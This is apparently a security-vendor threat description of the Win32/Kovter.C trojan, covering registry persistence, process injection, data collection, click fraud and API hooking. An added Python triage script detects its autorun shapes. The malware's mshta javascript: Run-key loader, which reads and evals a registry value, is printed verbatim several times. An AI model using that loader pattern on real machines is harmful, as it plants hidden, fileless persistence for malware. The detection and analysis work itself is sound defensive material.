Win32/Kovter [Threat Name]
Win32/Kovter.C [Threat Variant Name]
Category: trojan
Size: 311860 B
Aliases: Trojan.Win32.Kovter.kj (Kaspersky), Trojan.MulDrop6.7552 (Dr.Web), TR/Kovter.311854 (Avira)
Short description
The trojan serves as a backdoor. It can be controlled remotely.
Installation
The following Registry entries are set:
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKLM\\software\\%variable1%\\%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
- [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKCU\\software\\%variable1%\\%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
- "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKLM\\software\\%variable1%\\%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
- [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
- "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKCU\\software\\%variable1%\\%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
- [HKEY_LOCAL_MACHINE\SOFTWARE\%variable1%]
- "%variable2%" = "%javascriptpayload%"
- "%variable3%" = "%malwarepayload%"
- [HKEY_CURRENT_USER\SOFTWARE\%variable1%]
- "%variable2%" = "%javascriptpayload%"
- "%variable3%" = "%malwarepayload%"
This causes the trojan to be executed on every system start. The Run value starts mshta.exe with an inline javascript: URL; that script reads the %variable2% value through WScript.Shell.RegRead and passes its contents to eval(), so the first stage that runs at startup is fetched from the Registry rather than from a file on disk.
The trojan may create copies of itself using the following filenames:
- %localappdata%\%variable4%\%variable4%.exe
- %appdata%\%variable4%\%variable4%.exe
- %windows%\%variable4%\%variable4%.exe
- %commonappdata%\Microsoft\%variable4%\%variable4%.exe
A string with variable content is used instead of %variable1-4%.
The trojan may set the following Registry entries:
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- "0x9a352a44" = "%malwareinstallpath%"
- [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- "0x9a352a44" = "%malwareinstallpath%"
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
- "0x9a352a44" = "%malwareinstallpath%"
- [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
- "0x9a352a44" = "%malwareinstallpath%"
This causes the trojan to be executed on every system start.
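The two persistence shapes above (a Run value that launches an mshta javascript: loader which RegRead()s and eval()s a second Registry value, and a plain Run value pointing at %dir%\%variable4%\%variable4%.exe) can be triaged from a Registry snapshot. The script below is an added example written for this page, not ESET's code or anything shipped with the malware. It assumes the snapshot is a list of (hive, key, value name, data) tuples, and the names Ab3x, k91q, w5pc, Qx7 and alice in the sample are constructed stand-ins for %variable1-4% and the user name, not indicators.

```python
import re
from typing import Optional

# Added example (not ESET's code): triage a registry snapshot for the two
# persistence shapes in the write-up. Snapshot format is assumed to be a list of
# (hive, key, value_name, data) tuples as produced by whatever collector you use.
RUN_KEYS = {
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\policies\explorer\run",
}
HIVES = {"HKLM": "HKLM", "HKEY_LOCAL_MACHINE": "HKLM",
         "HKCU": "HKCU", "HKEY_CURRENT_USER": "HKCU"}
MSHTA_JS = re.compile(r'^\s*(?:[^\s"]*\\)?mshta(?:\.exe)?\s+javascript:', re.IGNORECASE)
REGREAD = re.compile(r'RegRead\(\s*"((?:[^"\\]|\\.)*)"\s*\)', re.IGNORECASE)
EVAL = re.compile(r"\beval\s*\(", re.IGNORECASE)
HEX_NAME = re.compile(r"0x[0-9a-f]{8}", re.IGNORECASE)            # value-name style seen above
SELF_NAMED = re.compile(r"\\([^\\]+)\\\1\.exe\b", re.IGNORECASE)   # ...\X\X.exe layout


def parse_mshta_loader(data) -> Optional[dict]:
    """If `data` is an 'mshta javascript:' one-liner, return the registry values it
    RegRead()s and whether it passes anything to eval(); otherwise return None."""
    if not isinstance(data, str) or not MSHTA_JS.match(data):
        return None
    script = data.replace("%20", " ")
    reads = []
    for raw in REGREAD.findall(script):
        path = raw.replace("\\\\", "\\")            # undo JavaScript backslash escaping
        hive, _, rest = path.partition("\\")
        key, _, name = rest.rpartition("\\")
        reads.append((HIVES.get(hive.upper(), hive.upper()), key, name))
    return {"reads": reads, "evals": bool(EVAL.search(script))}


def triage_autoruns(snapshot) -> list:
    """One finding per suspicious autorun value, with the reasons it was flagged and,
    for mshta loaders, whether the second-stage value is present in the snapshot."""
    index = {(h.upper(), k.lower(), n.lower()): d for h, k, n, d in snapshot}
    findings = []
    for hive, key, name, data in snapshot:
        if key.lower() not in RUN_KEYS:
            continue
        reasons, extra = [], {}
        loader = parse_mshta_loader(data)
        if loader:
            reasons.append("mshta_javascript_autorun")
            if loader["evals"] and loader["reads"]:
                reasons.append("regread_eval_stage2")   # first stage lives in the registry
            stage2 = []
            for thive, tkey, tname in loader["reads"]:
                present = (thive, tkey.lower(), tname.lower()) in index
                # REG_BINARY neighbours of the script value are candidate packed payloads
                blobs = sorted(n for (h, k, n), d in index.items()
                               if h == thive and k == tkey.lower() and n != tname.lower()
                               and isinstance(d, (bytes, bytearray)))
                stage2.append({"key": f"{thive}\\{tkey}", "name": tname,
                               "present": present, "binary_siblings": blobs})
            extra["stage2"] = stage2
        if isinstance(data, str) and SELF_NAMED.search(data):
            reasons.append("self_named_dir_binary")      # %dir%\%variable4%\%variable4%.exe
        if HEX_NAME.fullmatch(name):
            reasons.append("hex_value_name")
        if reasons:
            findings.append({"hive": hive, "key": key, "name": name,
                             "reasons": reasons, **extra})
    return findings


# Constructed sample snapshot. "Ab3x", "k91q", "w5pc", "Qx7" and "alice" are
# made-up stand-ins for %variable1-4% and the user name, not real indicators.
SAMPLE_SNAPSHOT = [
    ("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "0x9a352a44",
     'mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");'
     'Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKLM\\\\software\\\\Ab3x\\\\k91q");'
     'yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";'),
    ("HKLM", r"SOFTWARE\Ab3x", "k91q", "/* constructed stand-in for %javascriptpayload% */"),
    ("HKLM", r"SOFTWARE\Ab3x", "w5pc", b"\x4d\x5a\x90\x00\x03\x00"),   # %malwarepayload% blob
    ("HKCU", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
     "0x9a352a44", r"C:\Users\alice\AppData\Local\Qx7\Qx7.exe"),
    ("HKCU", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    ("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"%windir%\system32\SecurityHealthSystray.exe"),
]

if __name__ == "__main__":
    for finding in triage_autoruns(SAMPLE_SNAPSHOT):
        print(finding)
```

On the sample, the mshta value is flagged with its second-stage value resolved to HKLM\software\Ab3x\k91q and the binary neighbour w5pc listed; the Qx7 entry is flagged on both the self-named directory layout and the hexadecimal value name. The benign OneDrive entry is also flagged, on the directory layout alone, because %localappdata%\Microsoft\OneDrive\OneDrive.exe has exactly the shape the write-up lists under %commonappdata%\Microsoft\%variable4%\%variable4%.exe: treat that heuristic as a weak signal to be combined with the value name, file signature and creation time rather than as a verdict on its own.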
After the installation is complete, the trojan deletes the original executable file.
The trojan launches the following processes:
- regsvr32.exe
- %windir%\System32\regsvr32.exe
- rundll32.exe
- %windir%\System32\rundll32.exe
- explorer.exe
- %windir%\explorer.exe
- %malwarefilepath%
The trojan creates and runs a new thread with its own code within these running processes.
The following Registry entries are set:
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
- "1206" = 0
- "1809" = 3
- "2300" = 0
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
- "1206" = 0
- "1809" = 3
- "2300" = 0
- [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
- "%malwarefilename%" = 8888
- "iexplore.exe" = 8888
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
- "%malwarefilename%" = 8888
- "iexplore.exe" = 8888
Information stealing
The trojan collects the following information:
- malware version
- operating system version
- information about the operating system and system settings
- language settings
- installed antivirus software
- installed firewall application
- memory status
- CPU information
- list of running processes
- computer name
- user name
The trojan attempts to send gathered information to a remote machine.
Other information
The trojan acquires data and commands from a remote computer or the Internet.
The trojan contains a list of (173) URLs. The HTTP protocol is used.
It can execute the following operations:
- download files from a remote computer and/or the Internet
- run executable files
- send gathered information
- create Registry entries
- stop itself for a certain time period
The trojan sends HTTP requests that simulate clicks on banner advertisements, inflate web counter statistics, etc. (click fraud).
The trojan keeps various information in the following Registry keys:
- [HKEY_LOCAL_MACHINE\SOFTWARE\%variable%]
- [HKEY_CURRENT_USER\SOFTWARE\%variable%]
A string with variable content is used instead of %variable%.
The trojan hooks the following Windows APIs:
- CreateProcessAsUserA (advapi32.dll)
- CreateProcessAsUserW (advapi32.dll)
- CreateProcessWithLogonA (advapi32.dll)
- CreateProcessWithLogonW (advapi32.dll)
- CreateProcessWithTokenA (advapi32.dll)
- CreateProcessWithTokenW (advapi32.dll)
- RegSetValueA (advapi32.dll)
- RegSetValueExA (advapi32.dll)
- RegSetValueExW (advapi32.dll)
- RegSetValueW (advapi32.dll)
- DirectSoundCreate (dsound.dll)
- DirectSoundCreate8 (dsound.dll)
- RectVisible (gdi32.dll)
- CreateProcessA (kernel32.dll)
- CreateProcessW (kernel32.dll)
- OpenProcess (kernel32.dll)
- WinExec (kernel32.dll)
- NtOpenProcess (ntdll.dll)
- NtResumeThread (ntdll.dll)
- NtCreateProcess (ntdll.dll)
- NtCreateProcessEx (ntdll.dll)
- NtSetValueKey (ntdll.dll)
- CoCreateInstance (ole32.dll)
- CoCreateInstanceEx (ole32.dll)
- CoGetClassObject (ole32.dll)
- SHGetFolderPathW (shell32.dll)
- SHGetKnownFolderPath (shell32.dll)
- ShellExecuteA (shell32.dll)
- ShellExecuteExA (shell32.dll)
- ShellExecuteExW (shell32.dll)
- ShellExecuteW (shell32.dll)
- DialogBoxIndirectParamA (user32.dll)
- DialogBoxIndirectParamW (user32.dll)
- DialogBoxParamW (user32.dll)
- GetFocus (user32.dll)
- GetForegroundWindow (user32.dll)
- MessageBoxA (user32.dll)
- MessageBoxExA (user32.dll)
- MessageBoxExW (user32.dll)
- MessageBoxIndirectA (user32.dll)
- MessageBoxIndirectW (user32.dll)
- MessageBoxW (user32.dll)
- PostMessageA (user32.dll)
- SetWindowsHookExA (user32.dll)
- SetWindowsHookExW (user32.dll)
- WindowFromPoint (user32.dll)
- waveOutWrite (winmm.dll)
- HttpOpenRequestA (wininet.dll)
- HttpOpenRequestW (wininet.dll)
- InternetConnectA (wininet.dll)
- InternetConnectW (wininet.dll)
- InternetReadFile (wininet.dll)
- getaddrinfo (ws2_32.dll)
- GetAddrInfoExA (wsock32.dll)
- GetAddrInfoExW (wsock32.dll)
- GetAddrInfoW (wsock32.dll)